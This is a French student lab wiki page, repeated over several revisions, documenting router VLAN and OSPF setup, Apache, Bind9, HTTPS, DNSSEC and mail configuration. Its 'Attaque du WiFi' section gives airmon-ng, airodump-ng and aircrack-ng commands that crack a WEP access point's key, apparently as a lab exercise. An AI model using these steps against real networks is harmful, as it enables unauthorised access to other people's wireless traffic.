rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
interface GigabitEthernet0/0/1<br />
no ip address<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
<br />
Ils sont configurés pour utiliser les bridges-domains suivant:<br />
<br />
interface BDI20<br />
ip address 10.60.20.1 255.255.255.240<br />
!<br />
interface BDI21<br />
ip address 10.60.21.1 255.255.255.240<br />
!<br />
interface BDI22<br />
ip address 10.60.22.1 255.255.255.240<br />
!<br />
interface BDI23<br />
ip address 10.60.23.1 255.255.255.240<br />
!<br />
interface BDI24<br />
ip address 10.60.24.1 255.255.255.240<br />
!<br />
interface BDI25<br />
ip address 10.60.25.1 255.255.255.240<br />
! <br />
interface BDI26<br />
ip address 193.48.57.190 255.255.255.240<br />
!<br />
interface BDI131<br />
ip address 192.168.222.9 255.255.255.248<br />
!<br />
<br />
Les bridge-domains de 20 à 26 sont utilisés pour les VLAN correspondant à chaque utilisateur tandis que le BDI 31 est utilisé pour la communication avec le routeur de l'école.<br />
<br />
=== OSPF ===<br />
<br />
Le protocole OSPF (Open Shortest Path First) nous permet de partager nos tables de routage entre notre routeur et le routeur de l'école (192.168.222.8).<br />
<br />
router ospf 1<br />
router-id 10.60.20.1<br />
summary-address 10.60.20.0 255.255.255.0<br />
summary-address 10.60.21.0 255.255.255.0<br />
summary-address 10.60.22.0 255.255.255.0<br />
summary-address 10.60.23.0 255.255.255.0<br />
summary-address 10.60.24.0 255.255.255.0<br />
summary-address 10.60.25.0 255.255.255.0<br />
summary-address 10.60.26.0 255.255.255.0<br />
summary-address 193.48.57.176 255.255.255.240<br />
redistribute connected subnets<br />
redistribute static subnets route-map ospf<br />
network 192.168.222.8 0.0.0.7 area 2<br />
!<br />
<br />
<br />
== Xen ==<br />
=== Proxy ===<br />
<br />
Pour pouvoir installer le proxy, nous devons configurer le proxy pour que APT puisse accéder à internet:<br />
<br />
$ echo 'Acquire::http::Proxy "http://helfaut.escaut.net:3128";' > /etc/apt/apt.conf.d/01proxy<br />
<br />
<br />
=== Apache2 ===<br />
<br />
$ apt-get install apache2<br />
<br />
On peut ensuite accéder à [http://193.48.57.182] pour visualiser "Apache2 Debian Default Page...".<br />
<br />
<br />
=== Bind9 ===<br />
<br />
Une fois le nom de domaine acheté (unic0rn.pw) et configuré sur Gandi, il nous faut configurer bind9.<br />
<br />
$ apt-get install bind9<br />
<br />
On commence par ajouter le DNS secondaire ns6.gandi.net:<br />
<br />
$ cat /etc/bind/named.conf.options<br />
<br />
... <br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ;<br />
};<br />
<br />
Ensuite il faut définir notre nom de domaine comme une zone:<br />
<br />
$ cat /etc/bind/named.conf.local<br />
<br />
zone "unic0rn.pw" {<br />
type master;<br />
file "/etc/bind/unic0rn.pw";<br />
};<br />
<br />
Pour enfin écrire la configuration DNS associé à notre domaine et à ses sous-domaines:<br />
<br />
# cat unic0rn.pw<br />
<br />
$TTL 259200<br />
<br />
@ IN SOA dns.unic0rn.pw. admin.unic0rn.pw. (<br />
10 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns.unic0rn.pw.<br />
IN NS ns6.gandi.net.<br />
IN MX 100 dns.unic0rn.pw.<br />
IN A 193.48.57.182<br />
<br />
www IN A 193.48.57.182<br />
dns IN A 193.48.57.182<br />
<br />
On peut alors vérifier que tout fonctionne:<br />
<br />
# service bind9 restart<br />
$ host unic0rn.pw<br />
<br />
Using domain server:<br />
Name: 127.0.0.1<br />
Address: 127.0.0.1#53<br />
Aliases: <br />
<br />
unic0rn.pw has address 193.48.57.182<br />
unic0rn.pw mail is handled by 100 dns.unic0rn.pw.<br />
<br />
$ curl unic0rn.pw | less<br />
% Total % Received % Xferd Average Speed Time Time Time Current<br />
Dload Upload Total Spent Left Speed<br />
100 14286 0 14286 0 0 638k 0 --:--:-- --:--:-- --:--:-- 664k<br />
<!DOCTYPE html>...<br />
<br />
<br />
=== Sécurité ===<br />
<br />
On a tenté du bruteforce sur mon login root SSH le soir même de l'installation de mon nom de domaine. Bien que l'on ne puisse pas se connecter en root via ma configuration, j'ai tout de même ajouté fail2ban:<br />
<br />
# apt-get install fail2ban<br />
<br />
=== HTTPS ===<br />
<br />
Tout d'abord, il a fallu généré un certificat SSL. J'ai décidé de prendre un SHA-1 pour garder la compatibilité entre les navigateurs même si on devrait plutôt prendre un certificat SHA-2 pour une mise en production.<br />
<br />
$ openssl req -nodes -newkey rsa:2048 -sha1 -keyout monserveur.key -out serveur.csr<br />
<br />
Il faut alors coller la clé dans l'interface de Gandi afin d'obtenir notre certificat.<br />
<br />
Pour ensuite installer notre certificat, il faut activer la librairie SSL dans apache2:<br />
<br />
# a2enmod ssl<br />
<br />
Et vérifier que apache2 écoute bien sur le port SSL/TLS dans /etc/apache2/ports.conf:<br />
<br />
Listen 80<br />
<br />
<IfModule ssl_module><br />
Listen 443<br />
</IfModule><br />
<br />
<IfModule mod_gnutls.c><br />
Listen 443<br />
</IfModule><br />
<br />
Pour activer le certificat, j'ai choisis la méthode de vérification qui consiste a créer un document sur notre serveur web. Ceci dans le but que Gandi (ou Comodo) puisse vérifier que le serveur pointé par le nom de domaine nous appartient bien.<br />
Une fois notre certificat généré, il faut l'installer sur le serveur:<br />
<br />
$ cp unic0rn.pw.crt /etc/ssl/certs/<br />
$ cp monserveur.key /etc/ssl/private/unic0rn.pw.key<br />
$ cp GandiStandardSSLCA2.pem /etc/ssl/certs/<br />
$ c_rehash /etc/ssl/certs <br />
<br />
Puis modifier la configuration d'apache2:<br />
<br />
$ vim /etc/apache2/sites-enabled/000-default.conf<br />
<br />
<VirtualHost *:443><br />
ServerName www.unic0rn.pw<br />
ServerAlias unic0rn.pw<br />
DocumentRoot /var/www/html<br />
CustomLog /var/log/apache2/secure_access.log combined <br />
<br />
SSLEngine on<br />
SSLCertificateFile /etc/ssl/certs/unic0rn.pw.crt<br />
SSLCertificateKeyFile /etc/ssl/private/unic0rn.pw.key<br />
SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem<br />
SSLVerifyClient None<br />
</VirtualHost><br />
<br />
Et on peut ensuite accéder à https://unic0rn.pw !<br />
<br />
=== Serveur email ===<br />
<br />
Le nom de domaine a un email de configuré (admin@unic0rn.pw), nous devons donc s'arranger pour recevoir les emails. On installe donc un serveur d'email:<br />
<br />
# apt-get install postfix<br />
# echo "admin: root" >> /etc/aliases<br />
<br />
On envoie un email et on vérifie les emails:<br />
<br />
# mail<br />
<br />
=== DNSSEC ===<br />
<br />
On génére le couple de clés KSK et ZSK:<br />
<br />
$ cd /etc/bind<br />
$ mkdir unic0rn.pw.dnssec ; cd unic0rn.pw.dnssec<br />
$ dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE unic0rn.pw<br />
$ dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE unic0rn.pw<br />
<br />
/dev/urandom n'est pas sécurisé comme générateur de chiffres aléatoires, il est préférable d'utiliser un générateur hardware.<br />
<br />
On ajoute les clés générées dans le fichier de zone:<br />
<br />
$ vim /etc/bind/unic0rn.pw<br />
<br />
$include /etc/bind/unic0rn.pw.dnssec/unic0rn.pw-ksk.key<br />
$include /etc/bind/unic0rn.pw.dnssec/unic0rn.pw-zsk.key<br />
<br />
On chiffre signe ensuite le fichier de zone (cela va générer unic0rn.pw.signed):<br />
<br />
$ dnssec-signzone -o unic0rn.pw -k unic0rn.pw-ksk ../unic0rn.pw unic0rn.pw-zsk<br />
<br />
Et on indique au serveur que l'on va utiliser dnssec:<br />
<br />
$ vim named.conf.options<br />
<br />
dnssec-enable yes;<br />
<br />
$ vim named.conf.local<br />
<br />
zone "unic0rn.pw" {<br />
type master;<br />
file "/etc/bind/unic0rn.pw.signed";<br />
};<br />
<br />
$ service bind9 restart<br />
<br />
La fonctionnalité DNSSEC n'étant pas supporté sur les domaines .PW, notre implémentation s’arrêtera ici.<br />
<br />
== Attaque du WiFi ==<br />
<br />
On commence par activer le mode promicious de la carte wifi:<br />
<br />
# airmon-ng start wlan0mon<br />
<br />
On liste les points d'accès pour trouver une cible:<br />
<br />
# airodump-ng --encrypt wep wlan0mon<br />
<br />
J'ai décidé ici d'attaquer "cracotte01" (canal 10) qui est un point d'accès configuré en WEP. On commence donc par récupérer les paquets transitants par ce point d'accès:<br />
<br />
# airodump-ng -w out -c 10 -essid cracotte01 wlan0mon<br />
<br />
Heureusement pour nous, quelqu'un est déjà connecté dessus et génére beaucoup de paquets. On arrive rapidement à 200.000 paquets et on peut donc lancer le crack de la clé WEP:<br />
<br />
# aircrack-ng out-01.pcap<br />
<br />
KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4 ]<br />
<br />
[[File:Magic.gif]]</div>
Dfourny
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G1&diff=35420
TP sysres IMA2a5 2016/2017 G1
2016-11-25T11:36:46Z
<p>Dfourny : /* Attaque du WiFi */</p>
<hr />
<div> \<br />
\<br />
\\<br />
\\<br />
>\/7<br />
_.-(6' \<br />
(=___._/` \<br />
) \ |<br />
/ / |<br />
/ > /<br />
j < _\<br />
_.-' : ``.<br />
\ r=._\ `.<br />
<`\\_ \ .`-.<br />
\ r-7 `-. ._ ' . `\<br />
\`, `-.`7 7) )<br />
\/ \| \' / `-._<br />
|| .'<br />
\\ (<br />
unic0rn.pw >\ ><br />
,.-' >.'<br />
<.'_.''<br />
<'<br />
<br />
== Plages d'IP ==<br />
<br />
VLAN | Réseau | Prénom | Xen | IP Xen <br />
--------------------------------------------------------------<br />
VLAN20 10.60.20.0/24 Dimitri Vald 193.48.57.182/28<br />
VLAN21 10.60.21.0/24 Nabil Pnl 193.48.57.177/28<br />
VLAN22 10.60.22.0/24 Otmane Lartiste 193.48.57.178/28<br />
VLAN23 10.60.23.0/24 Hugo Gradur 193.48.57.179/28<br />
VLAN24 10.60.24.0/24 Clement Gringe 193.48.57.180/28<br />
VLAN25 10.60.25.0/24 Joan Orelsan 193.48.57.181/28<br />
VLAN26 193.48.57.176/28 Xen<br />
<br />
Routeur de Dimitri:<br />
* 10.60.2?.1<br />
* 193.48.57.190<br />
* 192.168.222.9<br />
<br />
Routeur de Nabil:<br />
* 10.60.2?.2<br />
* 193.48.57.189<br />
* 192.168.222.10<br />
<br />
== Configuration du routeur ==<br />
=== Version ===<br />
<br />
Je travaille actuellement sur une nouvelle version de IOS basé sur un Linux:<br />
<br />
Cisco IOS XE Software, Version 03.13.04.S - Extended Support Release<br />
Cisco IOS Software, ISR Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 15.4(3)S4, RELEASE SOFTWARE (fc3)<br />
<br />
<br />
=== Ports ===<br />
<br />
Les ports GigabitEthernet0/0/0 et GigabitEthernet0/0/1 ont exactement la même configuration puisque ce sont deux commutateurs qui seront branchés à ses ports.<br />
<br />
interface GigabitEthernet0/0/0<br />
no ip address<br />
media-type sfp<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
interface GigabitEthernet0/0/1<br />
no ip address<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
<br />
Ils sont configurés pour utiliser les bridges-domains suivant:<br />
<br />
interface BDI20<br />
ip address 10.60.20.1 255.255.255.240<br />
!<br />
interface BDI21<br />
ip address 10.60.21.1 255.255.255.240<br />
!<br />
interface BDI22<br />
ip address 10.60.22.1 255.255.255.240<br />
!<br />
interface BDI23<br />
ip address 10.60.23.1 255.255.255.240<br />
!<br />
interface BDI24<br />
ip address 10.60.24.1 255.255.255.240<br />
!<br />
interface BDI25<br />
ip address 10.60.25.1 255.255.255.240<br />
! <br />
interface BDI26<br />
ip address 193.48.57.190 255.255.255.240<br />
!<br />
interface BDI131<br />
ip address 192.168.222.9 255.255.255.248<br />
!<br />
<br />
Les bridge-domains de 20 à 26 sont utilisés pour les VLAN correspondant à chaque utilisateur tandis que le BDI 31 est utilisé pour la communication avec le routeur de l'école.<br />
<br />
=== OSPF ===<br />
<br />
Le protocole OSPF (Open Shortest Path First) nous permet de partager nos tables de routage entre notre routeur et le routeur de l'école (192.168.222.8).<br />
<br />
router ospf 1<br />
router-id 10.60.20.1<br />
summary-address 10.60.20.0 255.255.255.0<br />
summary-address 10.60.21.0 255.255.255.0<br />
summary-address 10.60.22.0 255.255.255.0<br />
summary-address 10.60.23.0 255.255.255.0<br />
summary-address 10.60.24.0 255.255.255.0<br />
summary-address 10.60.25.0 255.255.255.0<br />
summary-address 10.60.26.0 255.255.255.0<br />
summary-address 193.48.57.176 255.255.255.240<br />
redistribute connected subnets<br />
redistribute static subnets route-map ospf<br />
network 192.168.222.8 0.0.0.7 area 2<br />
!<br />
<br />
<br />
== Xen ==<br />
=== Proxy ===<br />
<br />
Pour pouvoir installer le proxy, nous devons configurer le proxy pour que APT puisse accéder à internet:<br />
<br />
$ echo 'Acquire::http::Proxy "http://helfaut.escaut.net:3128";' > /etc/apt/apt.conf.d/01proxy<br />
<br />
<br />
=== Apache2 ===<br />
<br />
$ apt-get install apache2<br />
<br />
On peut ensuite accéder à [http://193.48.57.182] pour visualiser "Apache2 Debian Default Page...".<br />
<br />
<br />
=== Bind9 ===<br />
<br />
Une fois le nom de domaine acheté (unic0rn.pw) et configuré sur Gandi, il nous faut configurer bind9.<br />
<br />
$ apt-get install bind9<br />
<br />
On commence par ajouter le DNS secondaire ns6.gandi.net:<br />
<br />
$ cat /etc/bind/named.conf.options<br />
<br />
... <br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ;<br />
};<br />
<br />
Ensuite il faut définir notre nom de domaine comme une zone:<br />
<br />
$ cat /etc/bind/named.conf.local<br />
<br />
zone "unic0rn.pw" {<br />
type master;<br />
file "/etc/bind/unic0rn.pw";<br />
};<br />
<br />
Pour enfin écrire la configuration DNS associé à notre domaine et à ses sous-domaines:<br />
<br />
# cat unic0rn.pw<br />
<br />
$TTL 259200<br />
<br />
@ IN SOA dns.unic0rn.pw. admin.unic0rn.pw. (<br />
10 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns.unic0rn.pw.<br />
IN NS ns6.gandi.net.<br />
IN MX 100 dns.unic0rn.pw.<br />
IN A 193.48.57.182<br />
<br />
www IN A 193.48.57.182<br />
dns IN A 193.48.57.182<br />
<br />
On peut alors vérifier que tout fonctionne:<br />
<br />
# service bind9 restart<br />
$ host unic0rn.pw<br />
<br />
Using domain server:<br />
Name: 127.0.0.1<br />
Address: 127.0.0.1#53<br />
Aliases: <br />
<br />
unic0rn.pw has address 193.48.57.182<br />
unic0rn.pw mail is handled by 100 dns.unic0rn.pw.<br />
<br />
$ curl unic0rn.pw | less<br />
% Total % Received % Xferd Average Speed Time Time Time Current<br />
Dload Upload Total Spent Left Speed<br />
100 14286 0 14286 0 0 638k 0 --:--:-- --:--:-- --:--:-- 664k<br />
<!DOCTYPE html>...<br />
<br />
<br />
=== Sécurité ===<br />
<br />
On a tenté du bruteforce sur mon login root SSH le soir même de l'installation de mon nom de domaine. Bien que l'on ne puisse pas se connecter en root via ma configuration, j'ai tout de même ajouté fail2ban:<br />
<br />
# apt-get install fail2ban<br />
<br />
=== HTTPS ===<br />
<br />
Tout d'abord, il a fallu généré un certificat SSL. J'ai décidé de prendre un SHA-1 pour garder la compatibilité entre les navigateurs même si on devrait plutôt prendre un certificat SHA-2 pour une mise en production.<br />
<br />
$ openssl req -nodes -newkey rsa:2048 -sha1 -keyout monserveur.key -out serveur.csr<br />
<br />
Il faut alors coller la clé dans l'interface de Gandi afin d'obtenir notre certificat.<br />
<br />
Pour ensuite installer notre certificat, il faut activer la librairie SSL dans apache2:<br />
<br />
# a2enmod ssl<br />
<br />
Et vérifier que apache2 écoute bien sur le port SSL/TLS dans /etc/apache2/ports.conf:<br />
<br />
Listen 80<br />
<br />
<IfModule ssl_module><br />
Listen 443<br />
</IfModule><br />
<br />
<IfModule mod_gnutls.c><br />
Listen 443<br />
</IfModule><br />
<br />
Pour activer le certificat, j'ai choisis la méthode de vérification qui consiste a créer un document sur notre serveur web. Ceci dans le but que Gandi (ou Comodo) puisse vérifier que le serveur pointé par le nom de domaine nous appartient bien.<br />
Une fois notre certificat généré, il faut l'installer sur le serveur:<br />
<br />
$ cp unic0rn.pw.crt /etc/ssl/certs/<br />
$ cp monserveur.key /etc/ssl/private/unic0rn.pw.key<br />
$ cp GandiStandardSSLCA2.pem /etc/ssl/certs/<br />
$ c_rehash /etc/ssl/certs <br />
<br />
Puis modifier la configuration d'apache2:<br />
<br />
$ vim /etc/apache2/sites-enabled/000-default.conf<br />
<br />
<VirtualHost *:443><br />
ServerName www.unic0rn.pw<br />
ServerAlias unic0rn.pw<br />
DocumentRoot /var/www/html<br />
CustomLog /var/log/apache2/secure_access.log combined <br />
<br />
SSLEngine on<br />
SSLCertificateFile /etc/ssl/certs/unic0rn.pw.crt<br />
SSLCertificateKeyFile /etc/ssl/private/unic0rn.pw.key<br />
SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem<br />
SSLVerifyClient None<br />
</VirtualHost><br />
<br />
Et on peut ensuite accéder à https://unic0rn.pw !<br />
<br />
=== Serveur email ===<br />
<br />
Le nom de domaine a un email de configuré (admin@unic0rn.pw), nous devons donc s'arranger pour recevoir les emails. On installe donc un serveur d'email:<br />
<br />
# apt-get install postfix<br />
# echo "admin: root" >> /etc/aliases<br />
<br />
On envoie un email et on vérifie les emails:<br />
<br />
# mail<br />
<br />
=== DNSSEC ===<br />
<br />
...<br />
<br />
== Attaque du WiFi ==<br />
<br />
On commence par activer le mode promicious de la carte wifi:<br />
<br />
# airmon-ng start wlan0mon<br />
<br />
On liste les points d'accès pour trouver une cible:<br />
<br />
# airodump-ng --encrypt wep wlan0mon<br />
<br />
J'ai décidé ici d'attaquer "cracotte01" (canal 10) qui est un point d'accès configuré en WEP. On commence donc par récupérer les paquets transitants par ce point d'accès:<br />
<br />
# airodump-ng -w out -c 10 -essid cracotte01 wlan0mon<br />
<br />
Heureusement pour nous, quelqu'un est déjà connecté dessus et génére beaucoup de paquets. On arrive rapidement à 200.000 paquets et on peut donc lancer le crack de la clé WEP:<br />
<br />
# aircrack-ng out-01.pcap<br />
<br />
KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4 ]<br />
<br />
[[File:Magic.gif]]</div>
Dfourny
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G1&diff=35419
TP sysres IMA2a5 2016/2017 G1
2016-11-25T11:36:27Z
<p>Dfourny : /* HTTPS */</p>
<hr />
<div> \<br />
\<br />
\\<br />
\\<br />
>\/7<br />
_.-(6' \<br />
(=___._/` \<br />
) \ |<br />
/ / |<br />
/ > /<br />
j < _\<br />
_.-' : ``.<br />
\ r=._\ `.<br />
<`\\_ \ .`-.<br />
\ r-7 `-. ._ ' . `\<br />
\`, `-.`7 7) )<br />
\/ \| \' / `-._<br />
|| .'<br />
\\ (<br />
unic0rn.pw >\ ><br />
,.-' >.'<br />
<.'_.''<br />
<'<br />
<br />
== Plages d'IP ==<br />
<br />
VLAN | Réseau | Prénom | Xen | IP Xen <br />
--------------------------------------------------------------<br />
VLAN20 10.60.20.0/24 Dimitri Vald 193.48.57.182/28<br />
VLAN21 10.60.21.0/24 Nabil Pnl 193.48.57.177/28<br />
VLAN22 10.60.22.0/24 Otmane Lartiste 193.48.57.178/28<br />
VLAN23 10.60.23.0/24 Hugo Gradur 193.48.57.179/28<br />
VLAN24 10.60.24.0/24 Clement Gringe 193.48.57.180/28<br />
VLAN25 10.60.25.0/24 Joan Orelsan 193.48.57.181/28<br />
VLAN26 193.48.57.176/28 Xen<br />
<br />
Routeur de Dimitri:<br />
* 10.60.2?.1<br />
* 193.48.57.190<br />
* 192.168.222.9<br />
<br />
Routeur de Nabil:<br />
* 10.60.2?.2<br />
* 193.48.57.189<br />
* 192.168.222.10<br />
<br />
== Configuration du routeur ==<br />
=== Version ===<br />
<br />
Je travaille actuellement sur une nouvelle version de IOS basé sur un Linux:<br />
<br />
Cisco IOS XE Software, Version 03.13.04.S - Extended Support Release<br />
Cisco IOS Software, ISR Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 15.4(3)S4, RELEASE SOFTWARE (fc3)<br />
<br />
<br />
=== Ports ===<br />
<br />
Les ports GigabitEthernet0/0/0 et GigabitEthernet0/0/1 ont exactement la même configuration puisque ce sont deux commutateurs qui seront branchés à ses ports.<br />
<br />
interface GigabitEthernet0/0/0<br />
no ip address<br />
media-type sfp<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
interface GigabitEthernet0/0/1<br />
no ip address<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
<br />
Ils sont configurés pour utiliser les bridges-domains suivant:<br />
<br />
interface BDI20<br />
ip address 10.60.20.1 255.255.255.240<br />
!<br />
interface BDI21<br />
ip address 10.60.21.1 255.255.255.240<br />
!<br />
interface BDI22<br />
ip address 10.60.22.1 255.255.255.240<br />
!<br />
interface BDI23<br />
ip address 10.60.23.1 255.255.255.240<br />
!<br />
interface BDI24<br />
ip address 10.60.24.1 255.255.255.240<br />
!<br />
interface BDI25<br />
ip address 10.60.25.1 255.255.255.240<br />
! <br />
interface BDI26<br />
ip address 193.48.57.190 255.255.255.240<br />
!<br />
interface BDI131<br />
ip address 192.168.222.9 255.255.255.248<br />
!<br />
<br />
Les bridge-domains de 20 à 26 sont utilisés pour les VLAN correspondant à chaque utilisateur tandis que le BDI 31 est utilisé pour la communication avec le routeur de l'école.<br />
<br />
=== OSPF ===<br />
<br />
Le protocole OSPF (Open Shortest Path First) nous permet de partager nos tables de routage entre notre routeur et le routeur de l'école (192.168.222.8).<br />
<br />
router ospf 1<br />
router-id 10.60.20.1<br />
summary-address 10.60.20.0 255.255.255.0<br />
summary-address 10.60.21.0 255.255.255.0<br />
summary-address 10.60.22.0 255.255.255.0<br />
summary-address 10.60.23.0 255.255.255.0<br />
summary-address 10.60.24.0 255.255.255.0<br />
summary-address 10.60.25.0 255.255.255.0<br />
summary-address 10.60.26.0 255.255.255.0<br />
summary-address 193.48.57.176 255.255.255.240<br />
redistribute connected subnets<br />
redistribute static subnets route-map ospf<br />
network 192.168.222.8 0.0.0.7 area 2<br />
!<br />
<br />
<br />
== Xen ==<br />
=== Proxy ===<br />
<br />
Pour pouvoir installer le proxy, nous devons configurer le proxy pour que APT puisse accéder à internet:<br />
<br />
$ echo 'Acquire::http::Proxy "http://helfaut.escaut.net:3128";' > /etc/apt/apt.conf.d/01proxy<br />
<br />
<br />
=== Apache2 ===<br />
<br />
$ apt-get install apache2<br />
<br />
On peut ensuite accéder à [http://193.48.57.182] pour visualiser "Apache2 Debian Default Page...".<br />
<br />
<br />
=== Bind9 ===<br />
<br />
Une fois le nom de domaine acheté (unic0rn.pw) et configuré sur Gandi, il nous faut configurer bind9.<br />
<br />
$ apt-get install bind9<br />
<br />
On commence par ajouter le DNS secondaire ns6.gandi.net:<br />
<br />
$ cat /etc/bind/named.conf.options<br />
<br />
... <br />
